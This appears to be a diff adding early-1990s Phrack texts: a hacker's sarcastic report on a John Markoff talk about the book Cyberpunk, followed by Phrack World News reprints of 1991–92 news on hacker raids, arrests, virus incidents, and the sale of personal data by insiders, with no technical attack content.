+           ^*^                                                   ^*^
+           PWN         P h r a c k   W o r l d   N e w s         PWN
+           ^*^         ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~         ^*^
+           PWN            Special Edition Issue Five             PWN
+           ^*^                                                   ^*^
+           PWN                  "WeenieFest '92"                 PWN
+           ^*^                                                   ^*^
+           PWN           ~A Meeting With John Markoff~           PWN
+           ^*^                                                   ^*^
+           PWN               Written by Count Zero               PWN
+           ^*^                                                   ^*^
+           PWN ^*^ PWN ^*^ PWN { WeenieFest'92 } PWN ^*^ PWN ^*^ PWN
+
+                  WeenieFest '92:  A Meeting With John Markoff
+     Co-Author of CYBERPUNK:  Outlaws and Hackers on the Computer Frontier
+
+                           ..oooOO Count Zero OOooo..
+
+                              count0@world.std.com
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+   "Boston Computer Society General Meeting, Wednesday, January 22, 7:30pm.
+    Katie Hafner, co-author with husband John Markoff of _Cyberpunk_, talks
+    about computer ethics [ya, right] and computer crimes.  _Cyberpunk_
+    details the stories of three computer hackers:  Kevin Mitnick, an expert
+    phone phreak, who carried his hacking to obsession [isn't that a perfume?]
+    and addiction-wreaking havoc [holy SHIT!] with computer networks and
+    top-secret research; Pengo, from Germany, who penetrated US military
+    computers and sold information to the Soviet Union; and Robert Morris,
+    a Harvard and Cornell graduate, who released a virus [WORM!] program that
+    crippled thousands of computers on Internet.  This discussion may change
+    how you think about computer accessibility [sure changed MY life..jeesh]."
+
+     That's how the advertisement appeared in the Boston Computer Society's
+UPDATE mag (without my bracketed snide comments, of course).  Knight Lightning
+informed me of this meeting via electronic mail, and I read it the DAY it was
+happening.  I had read about half of the book CYBERPUNK, and I know most of you
+have already checked it out.  Yes, it is a piece of shit.  A great deal of the
+info is *fabricated*, and the authors attempt to explain hacking as a "social
+disorder"...on par with juvenile delinquency.
+
+     True, a lot of hacking is just kids screwing around, but there is MORE to
+the scene than just that.  What about the violation of civil liberties going on
+by the federal government and its agents?  What about privacy on the nets?
+What about the REAL DRIVE behind most of the hacking going on today... the
+search for TECH KNOWLEDGE?  These topics were NOT covered adequately in the
+book.
+
+     Seeing this meeting as a GREAT opportunity to grill Ms. Hafner and to hear
+what members of the BCS had to say, I attempted to quickly mobilize the entire
+RDT crew into attending.  Alas, I was the *only* person able to make it.  "What
+the hell," I figured, "I'm sure there'll be plenty of other people there who'll
+make the discussion lively and *heated*."  Boy, was I wrong...
+
+     For starters, Ms. Hafner was unable to attend.  Instead, her husband and
+co-author, John Markoff showed up.  I had never been to a BCS meeting before,
+and figured that the members would be relatively intelligent about computers
+and computer ethics.  Well, about 80 people filled the lecture hall, and ALL of
+them were older than me (and I'm 24 by the way).  Looked like mostly yuppie
+trash ("Gee, I just bought this 486...I wonder what it does.  Guess I'll join
+the BCS!") and some old professor-types.  Suddenly, I felt a chill...
+*Weenie-alert*  Two bozos behind me were trying to discuss how to write an
+MS-DOS CONFIG.SYS file:
+
+         "Bob, my computer is all messed up.  Doesn't work."
+         "Gee, well, maybe you need one of those set device equals things!"
+
+NOTE: ALL quotes are REAL...Yes, truth is stranger than fiction...
+
+   Oh well...Finally, John Markoff came on-stage looking a lot like Dustin
+Hoffman.  He started out by talking for 15 minutes on the definitions
+of "hacker," "cracker," and "cyberpunk."  This is when my migraine started (a
+small throbbing pulse in my left temple).  He discussed the origin of the term
+"cyberpunk" and made MANY references to *BILL* Gibson.  Guess he wanted to
+stroke himself and make his "personal" relationship with Gibson known to all.
+Then, he talked in DETAIL about how HE figured out who set loose the Internet
+worm.  "I told them to 'finger RTM'... and the name Robert T. Morris popped
+up."  Boy, some SERIOUS tech wizardry going on there.  Markoff patted himself
+on the back for about 10 minutes more.  He also seemed proud of his dealings
+with Cliff Stoll (as he plugged THE CUCKOO'S EGG about 5 times).  Stroke,
+stroke, stroke.  He seemed really *proud* at having discovered all this info
+about the computer underground (even though his book is ONLY about *THREE* case
+studies!!!).
+
+                  "We wanted to get inside these cultures..."
+
+     Well his book was basically just a REPORT of WHAT HAPPENED (not even
+factual half the time)...  NOT about the CULTURE...  NOT about what really made
+these people tick...  NOT about what REALLY ATTRACTS people to the computer
+underground.  He was just a *reporter*, looking for a scoop.  Nothing more.
+
+     After describing his book, he opened up the presentation to discussion.
+The FIRST question was by some BCS dork:
+
+        "Do you know anything about the printer-ROM virus used in the
+         Iraqi computer systems?"
+
+I got a sick feeling in my stomach.  Markoff talked about this for 10 minutes
+with comments by other BCS members thrown in.  ARRRGH.  Anyway, the NEXT
+question was a real winner:
+
+         "What about those computers that took the Turing test recently..
+          did they pass?  Could you explain what a Turing test is?"
+
+So maybe the BCS people WERE NOT that up on things.  Maybe none of them read
+the book.  Maybe none of them have ever read Phrack or 2600.  Maybe ALL of them
+have their heads shoved up their butts?
+
+     Finally, I made my move.  I asked him:
+
+  "What do you think of the punishments given to convicted 'cyberpunks'?
+   Do you think they're fair?  What about seizure of equipment without
+   charges, taking examples from Operation Sundevil?"
+
+  Markoff:  "I think the government is just using scare tactics.  It's a shame
+             that equipment is seized.  It's unconstitutional."
+
+     Yep, that is all he had to say about it.  No comments on the POLICE STATE
+that's evolving on the nets.  Nothing about what's being done to *protect*
+computer users' free speech.  Next question of mine:
+
+      "What do you think really drives 'cyberpunks'...how 'serious' do you
+       think the *crime* of *hacking* is?"
+
+   Markoff:  "It's just juvenile delinquency.  Most of it has nothing to do
+              with tech wizardry.  It's mostly con-artists.  I hope there is
+              a 'fad element' to this cyberpunk thing.  Hopefully they'll
+              grow out of it."
+
+     Yeah, this guy certainly has his damn FINGER on the PULSE of the
+underground.  We're just a bunch of delinquent, juvenile con-artists.  We'll
+grow out of it.  Really.  Man, I was steamed.  What he said was full of
+*half-truths* leaving out IMPORTANT things, like the drive for exploration of
+highly complicated networks and machinery, but I wasn't going to pick a fight
+with this guy.  I calmed down and asked the next question on my list:
+
+     "What do you think of publications like Phrack and 2600?  How do you feel
+      about the E911 bust that tried to suppress Phrack?"
+
+ Markoff:  "I don't buy their 'exploration' excuse.  I don't want people
+            testing the locks on MY computer.  It's just juvenile delinquency."
+
+     How insightful.  Completely ignored my question about the E911 affair.  So
+much for understanding the underground.  Ya, we all read stuff like Phrack
+and 2600 JUST so we can FUCK UP things.
+
+     ***ONE interesting thing he mentioned was that MOST hacker-related crimes
+are INSIDE JOBS.  Trusted people working on the INSIDE.  Well, that was the
+ONLY thing he said that I totally agreed with.  At least Markoff isn't trying
+to start a "Cyberpunk Witch-Hunt"...not like OTHER people (i.e., Geraldo, Don
+Ingram, etc.).
+
+     This gets REAL funny now.  Other BCS members seemed to have NO interest in
+talking about hacking/phreaking/civil liberties/hacker ethic/etc.  ONE guy
+asked:
+            "Is piracy a big problem in the US?"
+
+Another asked:
+
+            "Do pirate bulletin boards still exist?"
+
+Some *insightful* BCS member said:
+
+        "Yeah, but it's dangerous.  Lawyers call up and check to see if you
+         have copyrighted software.  You can go to jail for it!"
+
+    Markoff:  "Yes, piracy is still rampant.  I can't give you any numbers
+               <cheesy smile here> but I know many exist."
+
+BCS member responds:
+
+            "You mean I can just call a number and get Pagemaker for free?"
+
+     At this point, I vomited violently..at least my BRAIN did.  Many other
+stupid questions were asked, but I won't torture you further ("What about the
+IBM/Apple merger?"...that sort of thing).  I managed to get in ONE LAST
+question:
+
+     "What do you think of 'reformed cyberpunks'...for nstance, the security
+      consulting company 'Comsec' formed by ex-LOD members?"
+
+  Markoff:  "I think that any company that hires them should know what they're
+             getting into.  I'm skeptical.  *I* wouldn't hire them."
+
+     You should know that at this point MOST of the BCS dorks laughed out loud,
+in annoying, weenie-like chuckles of mirth.  It took all of my strength not to
+get up and crack skulls.  So much for intelligent discussions.  Actually,
+throughout MOST of the meeting, people were laughing for no apparent reason.
+Guess they knew something I didn't?
+
+     In the final analysis, the meeting confirmed my suspicions that Markoff is
+just a reporter trying to make a buck.  Cashing in on half-truths.  Not at all
+interested in the "cyberpunk's" point of view.  Not interested in the ETHICS
+and MORAL RAMIFICATIONS of hacker busts.  He's just reporting the "news."  At
+least he wasn't trying to stir up a "witch-hunt"...but then again, he isn't
+contributing much to the awareness of the underground and what it "really"
+means...hacking is NOT a sickness...it is NOT something to "grow out of"...
+it means freedom of speech...freedom to explore (to an extent..heh) and the
+DESIRE to explore.  MUCH more than juvenile delinquency.  I hope someone writes
+a book from that perspective someday.
+
+   I also got an insight into the BCS community.  Clueless.  Need I say more?
+
+
+I hope you enjoyed this file.  Look for more "Special Reports" in the near
+future.
+
+                  :   -=Restricted -=Data -=Transmissions    :
+                  :                                          :
+                  : "Truth is cheap, but information costs." :
+
diff --git a/phrack37/11.txt b/phrack37/11.txt
new file mode 100644
index 0000000..c9494ca
--- /dev/null
+++ b/phrack37/11.txt
@@ -0,0 +1,584 @@
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN       Issue XXXVII / Part One of Four       PWN
+              PWN                                             PWN
+              PWN     Compiled by Dispater & Spirit Walker    PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ Federal Seizure Of "Hacker" Equipment                        December 16, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Barbara E. McMullen & John F. McMullen (Newsbytes)
+
+                      "New York's MOD Hackers Get Raided!"
+
+NEW YORK CITY -- Newsbytes has learned that a joint Unites States Secret
+Service / Federal Bureau of Investigation (FBI) team has executed search
+warrants at the homes of so-called "hackers" at various locations across the
+country and seized computer equipment.
+
+It is Newsbytes information that warrants were executed on Friday, December 6th
+in various places including New York City, Pennsylvania, and the state of
+Washington.  According to informed sources, the warrants were executed pursuant
+to investigations of violations of Title 18 of the federal statutes, sections
+1029 (Access Device Fraud), 1030 (Computer Fraud and Abuse Act), 1343 (Wire
+Fraud), and 2511 (Wiretapping).
+
+Law enforcement officials contacted by Newsbytes, while acknowledging the
+warrant execution, refused to comment on what was called "an on-going
+investigation." One source told Newsbytes that the affidavits underlying the
+search warrants have been sealed due to the on-going nature of the
+investigation."
+
+He added "There was obviously enough in the affidavits to convince judges that
+there was probable cause that evidence of a crime would be found if the search
+warrants were issued."
+
+The source also said that he would expect a statement to be issued by the
+Secret Service/FBI team "somewhere after the first of the year."
+_______________________________________________________________________________
+
+ Two Cornell Students Arrested for Spreading Computer Virus   February 27, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Lee A Daniels (New York Times News Service)
+ Special Thanks: Risks Digest
+
+Two Cornell University undergraduates were arrested Monday night and charged
+with developing and spreading a computer virus that disrupted computers as far
+away as California and Japan, Cornell officials said.  M. Stewart Lynn, vice
+president for information technologies at the university in Ithaca, N.Y.,
+identified the students as David Blumenthal and Mark Pilgrim.  Lynn said that
+both Blumenthal, who is in the engineering program, and Pilgrim, in the college
+of arts and sciences, were 19-year-old sophomores.  They were arrested on the
+evening of February 24 by Cornell and Ithaca police officers.  Lynn said the
+students were arraigned in Ithaca City Court on charges of second-degree
+computer tampering, a misdemeanor, and taken to the county jail.  Lynn said
+authorities believed that the two were responsible for a computer virus planted
+in three Macintosh games on February 14.
+
+He identified the games as Obnoxious Tetris, Tetricycle and Ten Tile Puzzle.
+The virus may have first appeared in a Stanford University public computer
+archive and spread from there through computer users who loaded the games into
+their own computers.
+
+Lynn said officials at Cornell and elsewhere became aware of the virus last
+week and quickly developed what he described as "disinfectant" software to
+eradicate it.  He said officials traced the virus to Cornell last week, but he
+would not specify how that was done or what led officials to the two students.
+Lynn said he did not yet know how much damage the virus had caused.  "At
+Cornell we absolutely deplore this kind of behavior," he said.
+
+Note: References to the Robert Morris, Jr. virus incident at Cornell deleted.
+      Associated Press reported that both defendants are being held in the
+      Tompkins County Jail on $10,000 bail.
+_______________________________________________________________________________
+
+ Man Admits to NASA Hacking                                   November 26, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By John C Ensslin (Rocky Mountain News)(Page 6)
+ Also see Phrack 34, File 11
+ Special Thanks: The Public
+
+A self-taught computer hacker with a high school education admitted Monday to
+breaking into a sensitive NASA computer system -- in less time than it takes
+the Broncos to play a football game.
+
+Richard G. Wittman Jr., 24, told  Denver U.S. District Judge Sherman Finesilver
+that it took him about "1 1/2 to 2 hours" on a personal computer using
+telephone lines in his apartment to tap into the space agency's restricted
+files.
+
+Wittman pleaded guilty Monday to one felony count of altering information
+-- a password -- inside a federal computer.  In exchange for the plea, federal
+prosecutors dropped six similar counts in indictments handed up in September.
+
+The Northglenn High School graduate told the judge he hadn't had much schooling
+in computers.  Most of what he knew about computers he learned from books.
+And most of those books, he said, are in a federal warehouse, seized after FBI
+agents searched his Westminster apartment last year.
+
+"Do you think you could teach these two lawyers about computers?"  Finesilver
+asked, referring to Wittman's public defender and the prosecutor.  "Probably,"
+Wittman replied.
+
+Wittman not only broke into 118 NASA systems,  he also reviewed files and
+electronic mail of other users, said assistant U.S. attorney Gregory C. Graf.
+
+It took NASA investigators nearly 300 hours to track Wittman an another 100
+hours to rewrite the software, Graf said.
+
+Wittman faces up to five years in prison and a $250,000 fine.  But Graf said
+the government will seek a much lighter penalty when Wittman is sentenced in
+Jan. 13.
+
+Both sides have agreed on repayment of $1,100 in collect calls placed to the
+other computer system.   But they differ on whether Wittman should be held
+responsible for the cost of new software.
+_______________________________________________________________________________
+
+ Hacker Pleads Guilty                                          December 5, 1991
+ ~~~~~~~~~~~~~~~~~~~~
+ Special Thanks: Iron Eagle
+
+"A 24-year-old Denver hacker who admitted breaking into a sensitive NASA
+computer system pleaded guilty to a felony count of altering information.
+
+In exchange for the plea Monday, federal prosecutors dropped six similar counts
+against Richard G. Wittman Jr., who faced up to five years in prison and a
+$250,000 fine.  Authorities said the government will seek a much lighter
+penalty when Wittman is sentenced January 13.
+
+Both sides have agreed on repayment of $1,100 in collect calls he placed to the
+computer system, but they differ on whether Wittman should be held responsible
+for the cost of new software.
+
+Wittman told U.S. District Judge Sherman Finesilver that it took him about two
+hours on a personal computer in his apartment to tap into the space agency's
+restricted files.  It took NASA investigators nearly 300 hours to track Wittman
+and an additional 100 hours to rewrite the software to prevent a recurrence,
+prosecutors said."
+_______________________________________________________________________________
+
+ Recent Novell Software Contains A Hidden Virus               December 20, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By John Markoff (New York Times)
+
+The nation's largest supplier of office-network software for personal computers
+has sent a letter to approximately 3,800 customers warning that it
+inadvertently allowed a software virus to invade copies of a disk shipped
+earlier this month.
+
+The letter, sent on Wednesday to customers of Novell Inc., a Provo, Utah,
+software publisher, said the diskette, which was mailed on December 11, had
+been accidentally infected with a virus known by computer experts as "Stoned
+111."
+
+A company official said yesterday that Novell had received a number of reports
+>from customers that the virus had invaded their systems, although there had
+been no reports of damage.
+
+But a California-based computer virus expert said that the potential for damage
+was significant and that the virus on the Novell diskette frequently disabled
+computers that it infected.
+
+MASSIVE POTENTIAL LIABILITIES
+
+"If this was to get into an organization and spread to 1,500 to 2,000 machines,
+you are looking at millions of dollars of cleanup costs," said John McAfee,
+president of McAfee & Associates, a Santa Clara, Calif. antivirus consulting
+firm.  "It doesn't matter that only a few are infected," he said.  "You can't
+tell.  You have to take the network down and there are massive potential
+liabilities."  Mr. McAfee said he had received several dozen calls from Novell
+users, some of whom were outraged.
+
+The Novell incident is the second such case this month.  On December 6, Konami
+Inc., a software game manufacturer based in Buffalo Grove, 111.wrote customers
+that disks of its Spacewrecked game had also become infected with an earlier
+version of the Stoned virus.  The company said in the letter that it had
+identified the virus before a large volume of disks had been shipped to
+dealers.
+
+SOURCE OF VIRUS UNKNOWN
+
+Novell officials said that after the company began getting calls earlier this
+week, they traced the source of the infection to a particular part of their
+manufacturing process.  But the officials said they had not been able to
+determine how the virus had infected their software initially.
+
+Novell's customers include some of nation's largest corporations.  The
+software, called Netware, controls office networks ranging from just two or
+three machines to a thousand systems.
+
+"Viruses are a challenge for the marketplace," said John Edwards, director of
+marketing for Netware systems at Novell.  "But we'll keep up our vigilance.  He
+said the virus had attacked a disk that contained a help encyclopedia that the
+company had distributed to its customers.
+
+SERVERS SAID TO BE UNAFFECTED
+
+Computer viruses are small programs that are passed from computer to computer
+by secretly attaching themselves to data files that are then copied either by
+diskette or via a computer network.  The programs can be written to perform
+malicious tasks after infecting a new computer, or do no more than copy
+themselves from machine to machine.
+
+In its letter to customers the company said that the Stoned 111 virus would not
+spread over computer networks to infect the file servers that are the
+foundation of networks.  File servers are special computers with large disks
+that store and distribute data to a network of desktop computers.
+
+The Stoned 111 virus works by attaching itself to a special area on a floppy
+diskette and then copying itself into the computer's memory to infect other
+diskettes.
+
+But Mr. McAfee said the program also copied itself to the hard disk of a
+computer where it could occasionally disable a system.  In this case it is
+possible to lose data if the virus writes information over the area where a
+special directory is stored.
+
+Mr. McAfee said that the Stoned 111 virus had first been reported in Europe
+just three months ago.  The new virus is representative of a class of programs
+known as "stealth" viruses, because they mask their location and are difficult
+to identify. Mr. McAfee speculated that this was why the program had escaped
+detection by the company.
+
+STEPS TOWARD DETECTION
+
+Novell has been moving toward adding new technology to its software to make it
+more difficult for viruses to invade it, Mr. Edwards said.  Recently, the
+company licensed special digital-signature software that makes it difficult for
+viruses to spread undetected. Novell plans to add this new technology to the
+next major release of its software, due out at the end of 1992.
+
+In the past, courts have generally not held companies liable for damages in
+cases where a third party is responsible, said Susan Nycum, a Palo Alto,
+California, lawyer who is an expert on computer issues.  "If they have been
+prudent it wouldn't be fair to hold them liable," she said.  "But ultimately it
+may be a question for a jury."
+_______________________________________________________________________________
+
+ Working Assets Long Distance!                                     January 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from an advertisement in Mother Jones
+
+(Not pictured is a photo of a college student giving "the finger" to someone
+and a caption that reads 'Twenty years later, we've given people a better way
+to put this finger to use.')
+
+The advertisement reads as follows:
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Sit-ins.  Protest marches, Flower power.  Times have changed but the need for
+grass roots involvement hasn't.
+
+Introducing "Working Assets Long Distance."  The ONLY phone company that is
+as committed to social and political change as you are.  Every time you use
+your finger to make a long distance call, one percent of the bill goes to
+non-profit action groups at no cost to you.  Hard-hitting advocacy groups like
+AMNESTY INTERNATIONAL, GREENPEACE, PLANNED PARENTHOOD, FEDERATION OF AMERICA,
+THE AMERICAN CIVIL LIBERTIES UNION, and many others.
+
+We're more than a phone company that gives money to good causes.  Our intent
+is to make your individual voice heard.  That's why we offer *FREE CALLS* to
+corporate and political leaders.  And well-argued letters at a fraction of
+the cost of a mail-gram.  So you can demand a halt to clear-cutting our
+ancient forests or let Senators know how you feel about important issues like
+reproductive rights.  It's that simple.  Your phone becomes a tool for
+democracy and you don't give up a thing.  You see, Working Assets comes with
+the exact same service as the major long distance carriers.  Convenient
+dial 1 calling 24-hour operation and fiber optic sound quality.  All this at
+rates lower that AT&T's basic rates.  And signing up couldn't be simpler.
+
+Just give us a call at 1-800-788-8588 ext 114 or fill out the coupon today.
+We'll hook you up right away without any intrusion or interruption.  So you
+can help change the world without lifting a finger.  Ok, maybe one finger.
+_______________________________________________________________________________
+
+ Computer Virus Used in Gulf War                               January 12, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from  The Boston Globe (Page 12)
+ Special Thanks: Tone Surfer
+
+Several weeks before the start of the Gulf War, US intelligence agents inserted
+a computer virus into a network of Iraqi computers tied to that country's air
+defense system, a news magazine reports.  US News and World Report said the
+virus was designed by the supersecret National Security Agency at Fort Meade,
+Maryland, and was intended to disable a mainframe computer.
+
+The report, citing two unidentified senior US officials, said the virus
+appeared to have worked, but it gave no details.  It said the operation may
+have been irrelevant, though, since the allies' overwhelming air superiority
+would have ensured the same results of rendering the air defense radars and
+missiles ineffective.  The secret operation began when American intelligence
+agents identified a French made computer printer that was to be smuggled from
+Amman, Jordan, to a military facility in Baghdad.
+
+The agents in Amman replaced a computer chip in the printer with another
+micro-chip that contained the virus in its electronic circuits.  By attacking
+the Iraqi computer through the printer, the virus was able to avoid detection
+by normal electronic security procedures, the report said.  "Once the virus was
+in the system, the US officials explained, each time an Iraqi technician opened
+a "window" on his computer screen to access information, the contents of the
+screen simply vanished," US News reported.
+
+The report is part of a book, based on 12 months of research by US News
+reporters, called "Triumph without Victory: The Unreported History of the
+Persian Gulf War," to be published next month.
+_______________________________________________________________________________
+
+ Indictments of "Information Brokers"                              January 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from The Privacy Journal
+
+The unholy alliance between "information brokers" and government bureaucrats
+who provide personal information has been uncovered in the grand jury
+indictments of 18 persons in 14 states.
+
+United States Attorney Michael Chertoff in Newark, New Jersey, and his
+counterpart in Tampa, Florida, accused eight "information brokers" (or
+"information gatekeepers" or "super bureaus") of bribing two Social Security
+Administration employees to provide confidential earnings and employee
+information stored in federal computer files.  The brokers, who fill in the
+cracks not occupied by national credit bureaus and who also track the
+whereabouts of persons, would sell the information to their clients --
+retailers, lawyers, detectives, insurance companies, and others.
+
+Ned Flemming, president of Super Bureau Inc. of Montery, California, was
+indicted on 32 counts for coaxing a Social Security supervisor in New Jersey
+named Joseph Lynch (who was not charged) to provide confidential personal
+information for a fee.  Fleming's daughter, Susan, was charged also, as were
+Victor Fought, operator of Locate Unlimited in Mesa, Arizona; George T.
+Theodore, owner of Tracers Worldwide Services in Corpus Christi, Texas;
+Richard Stone, owner of Interstate Information Services in Port Jefferson, New
+York; and Michael Hawes, former owner of International Criminal Investigative
+Agency (ICIA) in Port Angeles, Washington, for participating in the same
+conspiracy.  Another broker, Joseph Norman Dillon Ross, who operates a firm
+under his name in Pauma Valley, California also accepted the personal data,
+according to Chertoff, but was not charged.  Richard Stone was further indicted
+for corrupting a Social Security claims clerk in Melrose Park, Illinois.  Also
+charged were Allen Schweitzer and his wife Petra, who operate Security Group
+Group in Sumner, Washington.
+
+The government employees also stole personal information from the FBI's
+National Crime Information Center (NCIC), which stores data on arrests and
+missing persons.
+
+Fleming told Privacy Journal that he had never met Lynch.  Stone refused to
+comment.  Tracers Worldwide, ICIA, and Locate Unlimited are not listed in
+telephone information, although all three companies are required by the Fair
+Credit Reporting Act to permit the subjects of their files to have disclosure
+of such information to them.
+
+The 18-month long investigation culminating in the December 18 indictments and
+arrests is only the first phase, said Assistant U.S. Attorney Jose Sierra.  "We
+don't think it stops there."
+
+For the past three years, the Big Three credit bureaus have continued to sell
+credit information regularly to information brokers, even after complaints that
+some of them violated the Fair Credit Reporting Act in disclosing credit
+information for impermissible purposes.  Trans Union's president, Albert
+Flitcraft, told Congress in 1989 that is was not possible for a major credit
+bureau to protect consumer information sold to brokers.  John Baker, Equifax
+senior vice-president, said at the time that the Big Three would "put together
+our best thinking" to see if safeguards could be developed.  By 1991, Oscar
+Marquis, vice-president of Trans Union, was asking Congress for solutions, but
+Baker presented Equifax's new guidelines and checklist for doing business with
+the brokers.  None of the Big Three has been willing to cease doing business
+with the cloudy merchants of recycled credit reports -- and of purloined Social
+Security and FBI information.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Meanwhile, at the Internal Revenue Service...
+
+Two weeks after he blew the cover off the information brokers, U.S. Attorney
+Michael Chertoff in New Jersey indicted a retired chief of the Internal Revenue
+Service Criminal Investigation Division for selling personal information to a
+California private investigative firm in his last week on the job in 1988.
+
+For a $300 payment, according to the indictment, the IRS executive, Robert G.
+Roche, promised to procure non-public marital records from vital records
+offices.  Using false pretenses, he ordered one of his subordinates to get the
+information, on government time.  The aide got the records in one instance only
+after writing out an IRS summons and in another instance after producing a
+letter on IRS stationary saying the information was needed for "official
+investigative matters."  Roche, according to the U.S. Attorney, accepted
+payment from the California investigative firm of Saranow, Wells, & Emirhanian,
+part of a larger network called Financial Investigative Services Group.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+The Privacy Journal is an independent monthly on privacy in the computer age.
+They can be reached at:
+
+                                Privacy Journal
+                                 P.O Box 28577
+                        Providence, Rhode Island  02908
+                                 (401)274-7861
+_______________________________________________________________________________
+
+ SSA, FBI Database Violations Prompt Security Evaluations      January 13, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Kevin M. Baerson (Federal Computer Week)(Pages 1, 41)
+
+Indictments recently handed down against insiders who bought and sold
+confidential information held in Federal Bureau of Investigation and Social
+Security Administration computers have prompted agency officials to evaluate
+how well the government secures its databases.
+
+"I see this as positive more than negative," said David Nemecek, section chief
+for the FBI's National Crime Information Center (NCIC), which contains data on
+thousands of people suspected and convicted of crimes.  "Am I happy it
+happened?  No.  But it led us to discovering that this was happening and it
+sends a message that if people try it, they will get caught."
+
+But Renny DiPentima, assistant commissioner of SSA's Office of System Design
+and Development, said he did not view the indictments as a positive
+development.
+
+"It's not a victory," DiPentima said.  "Even if we catch them, it's a loss.  My
+victory is when I never have a call that someone has abused their position."
+
+The "information broker" bust was the culmination of an 18-month investigation
+by the Department of Health and Human Services' inspector general's office in
+Atlanta.  Officials said it was the largest case ever prosecuted involving the
+theft of federal computer data.  More indictments could be forthcoming, they
+said.
+
+Special agents from the FBI joined the inquiry and in the end nabbed 18 people
+>from 10 states, including one former and two current SSA employees.  Others
+indicted were a Chicago police officer, an employee of the Fulton County
+Sheriff's Office in Georgia, and several private investigators.
+
+The indictments alleged that the investigators paid for confidential data,
+including criminal records and earnings histories, that was lifted from the
+databases by people who exploited their access to the records.
+
+"The FBI cannot manage every person in the United States," Nemecek said.  "We
+have all kinds of protection to prevent this from happening.  We keep logs of
+who uses the systems and for what, security training programs and routine
+audits of inquiries."
+
+"But the people who committed the violations had access to the system, and
+there's only one way to deal with that: aggressive prosecution of people who do
+this.  And the FBI is actively pursuing these individuals."
+
+DiPentima's problem is equally delicate.  His agency performs 15 million
+electronic transactions per day -- 500 per second -- and monitoring the rights
+and wrongs of those people is a daunting task.
+
+Currently, every employee who uses the network is assigned a password and
+personal identification number, which change frequently.  Depending on the
+nature of the employee's job, the PIN grants him access to certain types of
+information.
+
+If the employee tries to access a menu in the system that he has not been
+authorized to enter, or makes more than one error in entering his PIN number,
+he is locked off the system.  Once that happens, only a security office from
+one of SSA's 10 regional offices can reinstate the employee.
+
+An SSA section chief and six analysts, working from the agency's data center
+headquarters outside Baltimore, also search routinely for transactional
+aberrations such as employees who have made an unusual number of transactions
+on a certain account.
+
+The FBI also has a number of security precautions in place.  FBI personnel
+conduct random audits of searches, and Nemecek said sweeping state and local
+audits of the system are performed biannually.  Furthermore, if the FBI
+desires, it easily can track an access request back to the terminal and user it
+came from.
+
+DiPentima said that in the wake of the indictments, he is considering new
+policies to clamp down on abusers.
+
+Nemecek said that as the FBI continues upgrading the NCIC database, the center
+might automate further its auditing of state and local agencies to detect
+patterns and trends of use the way SSA does.
+
+But despite efforts to tighten the screws on network security, both men realize
+that in cases of federal and municipal employees who exploit authorized access,
+technology and policies can only go so far in affecting human nature.
+_______________________________________________________________________________
+
+ Free University Suffers Damage.                              February 24, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By The Dude (of Holland)
+
+An investigation by the Amsterdam police, in cooperation with an anti-fraud
+team of the CRI (sort of like the FBI), and the geographical science department
+of the Free University has led to the arrests of two hackers.  The two had
+succeeded to break into the department's computer system and caused damage of
+over 100,000 Dutch Guilders.
+
+In a press conference, held by the research teams last Friday, it was stated
+that the duo, a 25-year old computer-science engineer R.J.N. from Nuenen
+[aka Fidelio] and a 21-year old student computer-science H.H.H.W. from Roermond
+[aka Wave], were the first "hackers" to be arrested in the Netherlands.  In
+several other countries this has already happened before.
+
+The arrested hackers made a complete confession.  Since November 1991, they
+have entered the University's computer between 30 and 40 times.  The system
+was known as "bronto."  From this system the hackers were able to gain access
+to other systems, thus travelling to systems in the US, Scandinavia, Spain and
+Italy.
+
+According to the leader of the computer-crime team of the Amsterdam police,
+D. Komen, the two cracked codes of the VU-system to get in.  They got their
+hands on so-called "passwords" of officially registered users, which allowed
+them to use the system at no cost.  They were also able to get the "highest of
+rights" within the computer system "bronto."
+
+A total of four houses were searched, and several PC's, printouts and a large
+quantity of diskettes was seized.  The duo was taken to the DA and imprisoned.
+Because "hacking" is not a criminal offense in the Netherlands, the suspects
+are officially accused of falsification of records, destruction of property,
+and fraud.
+
+This year the government expects to enact legislation that will make hacking a
+criminal offense, according to P.Slort of the CRI.
+
+The hacker-duo stated that they undertook their illegal activities because of
+fanatic "hobbyism."  "It's a kick to see how far you can go", says Mr. Slort of
+the CRI.  The two said they did not know that their data journeys had caused
+enormous damages.  The police do not see them as real criminals, either since
+the pair did not earn money from their activities.
+_______________________________________________________________________________
+
+ Computer Engineer Gets Death Sentence                         February 9, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Special Thanks: Ninja Master
+
+Richard Farley was cool to the end, taking a sip of water and smoothing his
+jacket before leaving the courtroom where he was sentenced to die for killing
+seven people in a rage over unrequited love.
+
+"I'm not somebody who is demonstrative or prone to shedding tears", Farley said
+Friday before apologizing for the slayings.  "I do feel sorry for the
+victims....I'm not a perfect human being.  I'm good.  I'm evil."
+
+Farley was convicted in October of the 1988 slayings at ESL Inc., a Sunnyvale
+defense contractor.  Jurrors on November 1st recommended the death penalty for
+the computer engineer, who prosecutors said planned the rampage to get the
+attention of a former co-worker who rejected him.
+
